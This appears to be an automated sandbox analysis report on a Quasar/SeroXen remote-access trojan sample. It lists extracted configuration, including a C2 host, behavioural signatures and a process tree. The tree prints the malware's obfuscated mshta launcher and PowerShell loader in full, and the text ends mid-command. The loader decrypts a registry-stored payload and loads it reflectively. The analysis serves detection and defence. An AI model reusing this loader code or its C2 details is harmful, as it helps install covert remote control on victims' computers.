Analysis
- max time kernel: 300s
- max time network: 296s
- platform: windows10-2004_x64
- resource: win10v2004-20240426-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 02-06-2024 15:12
- Static task static1
- Behavioral task behavioral1: sample DarkMoon_Gen_1-3/lib/main.exe, resource win10v2004-20240426-en
- Behavioral task behavioral2: sample DarkMoon_Gen_1-3/lib/uni.bat, resource win7-20240220-en
- Behavioral task behavioral3: sample DarkMoon_Gen_1-3/lib/uni.bat, resource win10v2004-20240426-en
- Behavioral task behavioral4: sample DarkMoon_Gen_1-3/starter.bat, resource win7-20240508-en
- Behavioral task behavioral5: sample DarkMoon_Gen_1-3/starter.bat, resource win10v2004-20240426-en
General
- Target: DarkMoon_Gen_1-3/starter.bat
- Size: 51B
- MD5: abc778ba27885c72f364ad89b1306862
- SHA1: 2d4bfe8e2de4390109e8fa786ad47ec68daeaffe
- SHA256: 97c5438395ba799a673564195db730de8d9742a7a141566fa7c9075c46e3a039
- SHA512: 65a9bcdb3493526dd0b340aacabd30cd2e577a03cac920341e7be041e8de133ced0ab45c14a2509fbbd6f2451ac3ef1f5d520328d44f06aa4af6bfb122991f8f
Malware Config
Extracted
- Family: quasar
- Version: 1.0.0.0
- Botnet: v2.2.6 | SeroXen
- C2: seroooooxeen.chickenkiller.com:5059
- Mutex: f953c0af-702a-46b5-ad07-d900b11c5cd9
- encryption_key: 458790DC6E62EEB3043B4566BF95CDAF711F1EC0
- install_name: .exe
- log_directory: $sxr-Logs
- reconnect_delay: 3000
Signatures
-
Quasar payload 1 IoCs
Processes:
- Memory dump behavioral5/memory/1064-58-0x0000026D7B8D0000-0x0000026D7C09A000-memory.dmp matches YARA rule family_quasar
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
Processes:
- PID 5344 WerFault.exe created PID 3592 svchost.exe
- PID 4824 WerFault.exe created PID 4200 dllhost.exe
- PID 5608 WerFault.exe created PID 4576 dllhost.exe
- PID 6076 WerFault.exe created PID 4932 dllhost.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Processes:
- PID 3924 uni.bat.exe created PID 616 winlogon.exe (2 events)
- PID 1064 $sxr-powershell.exe created PID 616 winlogon.exe (7 events)
- PID 5164 svchost.exe created PID 3592 svchost.exe
- PID 5164 svchost.exe created PID 4200 dllhost.exe
- PID 5164 svchost.exe created PID 4576 dllhost.exe
- PID 5164 svchost.exe created PID 4932 dllhost.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
- wmiprvse.exe: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate
- wmiprvse.exe: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
- $sxr-mshta.exe: key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation
- uni.bat.exe: key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation
Executes dropped EXE 5 IoCs
Processes:
- PID 3924 uni.bat.exe
- PID 3156 $sxr-mshta.exe
- PID 668 $sxr-cmd.exe
- PID 1064 $sxr-powershell.exe
- PID 4712 $sxr-powershell.exe
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
- main.exe: set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
- svchost.exe: file opened (read-only) \??\Q:, \??\R:, \??\X:, \??\Y:, \??\G:, \??\L:, \??\U:, \??\M:, \??\O:, \??\T:, \??\H:, \??\K:, \??\E:, \??\I:, \??\J:, \??\N:, \??\P:, \??\S:, \??\A:, \??\B:, \??\Z:, \??\V:, \??\W:
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
- wmiprvse.exe: file opened for modification \??\PHYSICALDRIVE0
Drops file in System32 directory 12 IoCs
Processes:
- svchost.exe: file opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx
- svchost.exe: file opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx
- svchost.exe: file opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx
- svchost.exe: file opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
- svchost.exe: file opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
- svchost.exe: file opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
- svchost.exe: file opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
- svchost.exe: file opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
- svchost.exe: file opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
- svchost.exe: file opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
- svchost.exe: file opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
- OfficeClickToRun.exe: file opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml
Suspicious use of SetThreadContext 18 IoCs
Processes:
- PID 3924 uni.bat.exe set thread context of dllhost.exe PIDs 2888, 4344, 6008, 4280
- PID 1064 $sxr-powershell.exe set thread context of dllhost.exe PIDs 3624, 2900, 4976, 3236, 4176, 5108, 2212, 4200, 4576, 5552, 3484, 4932, 3928, 3344
Drops file in Windows directory 14 IoCs
Processes:
- uni.bat.exe: file created C:\Windows\$sxr-mshta.exe
- uni.bat.exe: file created C:\Windows\$sxr-cmd.exe
- uni.bat.exe: file created C:\Windows\$sxr-powershell.exe
- uni.bat.exe: file opened for modification C:\Windows\$sxr-mshta.exe
- uni.bat.exe: file opened for modification C:\Windows\$sxr-cmd.exe
- uni.bat.exe: file opened for modification C:\Windows\$sxr-powershell.exe
- svchost.exe: file opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb
- svchost.exe: file opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm
- svchost.exe: file opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log
- svchost.exe: file opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb00011.log
- svchost.exe: file opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk
- svchost.exe: file opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log
- svchost.exe: file opened for modification C:\Windows\WindowsUpdate.log
- WerFault.exe: file created C:\Windows\AppCompat\Programs\Amcache.hve.tmp
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
- PID 3116 WerFault.exe handled crash of PID 4200 dllhost.exe
- PID 5588 WerFault.exe handled crash of PID 4932 dllhost.exe
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
- WerFault.exe: key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (4 events)
- WerFault.exe: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (4 events)
- WerFault.exe: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (4 events)
- svchost.exe: key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0
- svchost.exe: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Delays execution with timeout.exe 13 IoCs
Processes:
- timeout.exe PIDs 2880, 4256, 5740, 4856, 4492, 3160, 5424, 5740, 2524, 5836, 5980, 4568, 3116
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
- wmiprvse.exe: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
- WerFault.exe: key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS (4 events)
- WerFault.exe: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (4 events)
Kills process with taskkill 1 IoCs
Processes:
- PID 1284 taskkill.exe
Modifies data under HKEY_USERS 55 IoCs
Modifies registry class 1 IoCs
Processes:
- $sxr-mshta.exe: key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Runs ping.exe 1 TTPs 18 IoCs
Processes:
- PING.EXE PIDs 2120, 2604, 4084, 4808, 4040, 3376, 2348, 3956, 4636, 5908, 2308, 4976, 3124, 3940, 5844, 5896, 4720, 2568
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (64 events, repeated entries collapsed to one line per process):
- PID 3924 uni.bat.exe
- PID 2888 dllhost.exe
- PID 4344 dllhost.exe
- PID 1064 $sxr-powershell.exe
- PID 3624 dllhost.exe
- PID 2900 dllhost.exe
- PID 4712 $sxr-powershell.exe
- PID 4976 dllhost.exe
- PID 3236 dllhost.exe
- PID 4340 WerFault.exe
- PID 5164 svchost.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
- Token: SeDebugPrivilege, PID 3924 uni.bat.exe (2 events)
- Token: SeDebugPrivilege, PID 2888 dllhost.exe
- Token: SeDebugPrivilege, PID 4344 dllhost.exe
- Token: SeDebugPrivilege, PID 1064 $sxr-powershell.exe (3 events)
- Token: SeDebugPrivilege, PID 3624 dllhost.exe
- Token: SeDebugPrivilege, PID 2900 dllhost.exe
- Token: SeDebugPrivilege, PID 4712 $sxr-powershell.exe
- Token: SeDebugPrivilege, PID 4976 dllhost.exe
- Token: SeDebugPrivilege, PID 3236 dllhost.exe
- PID 2400 svchost.exe (52 events, cycling through): SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
- PID 1064 $sxr-powershell.exe
- PID 1600 Conhost.exe
Suspicious use of UnmapMainImage 1 IoCs
Processes:
- PID 3360 Explorer.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes (consecutive duplicate entries collapsed, grouped by writing process):
- PID 3204 cmd.exe wrote to memory of PID 2812 cmd.exe and PID 3356 main.exe
- PID 3356 main.exe wrote to memory of PID 1384 cmd.exe
- PID 1384 cmd.exe wrote to memory of PID 3344 chcp.com
- PID 1384 cmd.exe wrote to memory of timeout.exe PIDs 2880, 4856, 4568, 3160, 3116
- PID 1384 cmd.exe wrote to memory of PING.EXE PIDs 2120, 2604, 2308, 4040, 2568, 3376, 4084, 4976, 3124, 2348, 4808, 3956
- PID 2812 cmd.exe wrote to memory of PID 3924 uni.bat.exe
- PID 3924 uni.bat.exe wrote to memory of PID 2888 dllhost.exe (7 events) and PID 4344 dllhost.exe (9 events)
- PID 3156 $sxr-mshta.exe wrote to memory of PID 668 $sxr-cmd.exe
- PID 668 $sxr-cmd.exe wrote to memory of PID 1064 $sxr-powershell.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
Process tree (indentation shows parent/child depth; each entry gives the image path, its command line, and the signatures it triggered)

C:\Windows\system32\winlogon.exe
    Command line: winlogon.exe
    C:\Windows\system32\dwm.exe
        Command line: "dwm.exe"
    C:\Windows\System32\dllhost.exe
        Command line: C:\Windows\System32\dllhost.exe /Processid:{13e79cba-8a92-4d0c-81c3-a2b5c0a4024e}
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\dllhost.exe
        Command line: C:\Windows\System32\dllhost.exe /Processid:{5ca1758b-deb9-462e-8367-768cf7dde266}
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\dllhost.exe
        Command line: C:\Windows\System32\dllhost.exe /Processid:{e1f11d71-60ac-4809-96d0-b066f4867e5b}
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\dllhost.exe
        Command line: C:\Windows\System32\dllhost.exe /Processid:{ffd5144c-da1e-4a02-9077-46fdd324c0cc}
    C:\Windows\System32\dllhost.exe
        Command line: C:\Windows\System32\dllhost.exe /Processid:{a4035435-0671-42aa-928d-d639d53355c3}
    C:\Windows\System32\dllhost.exe
        Command line: C:\Windows\System32\dllhost.exe /Processid:{b3afd662-1c33-4ec2-ae4d-f077a945226c}
    C:\Windows\System32\dllhost.exe
        Command line: C:\Windows\System32\dllhost.exe /Processid:{cd993c8e-b9fb-46a5-b1bd-e754d3bf0206}
        C:\Windows\system32\WerFault.exe
            Command line: C:\Windows\system32\WerFault.exe -u -p 4576 -s 400
            - Checks processor information in registry
            - Enumerates system info in registry
    C:\Windows\System32\dllhost.exe
        Command line: C:\Windows\System32\dllhost.exe /Processid:{b284631b-6801-43c1-9a39-717aeaba006a}
    C:\Windows\System32\dllhost.exe
        Command line: C:\Windows\System32\dllhost.exe /Processid:{86bb4222-3e9a-4574-96a8-75d1d1167cfb}

C:\Windows\system32\lsass.exe
    Command line: C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
    C:\Windows\system32\taskhostw.exe
        Command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    C:\Windows\$sxr-mshta.exe
        Command line: C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
        - Checks computer location settings
        - Executes dropped EXE
        - Modifies registry class
        - Suspicious use of WriteProcessMemory
        C:\Windows\$sxr-cmd.exe
            Command line: "C:\Windows\$sxr-cmd.exe" /c %$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory
            C:\Windows\System32\Conhost.exe
                Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            C:\Windows\$sxr-powershell.exe
                Command line (cut off in the report): C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = 
[Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{87bfd4c7-5286-45b3-b1d1-1b9e199a85eb}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1064).WaitForExit();[System.Threading.Thread]::Sleep(5000); function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = 
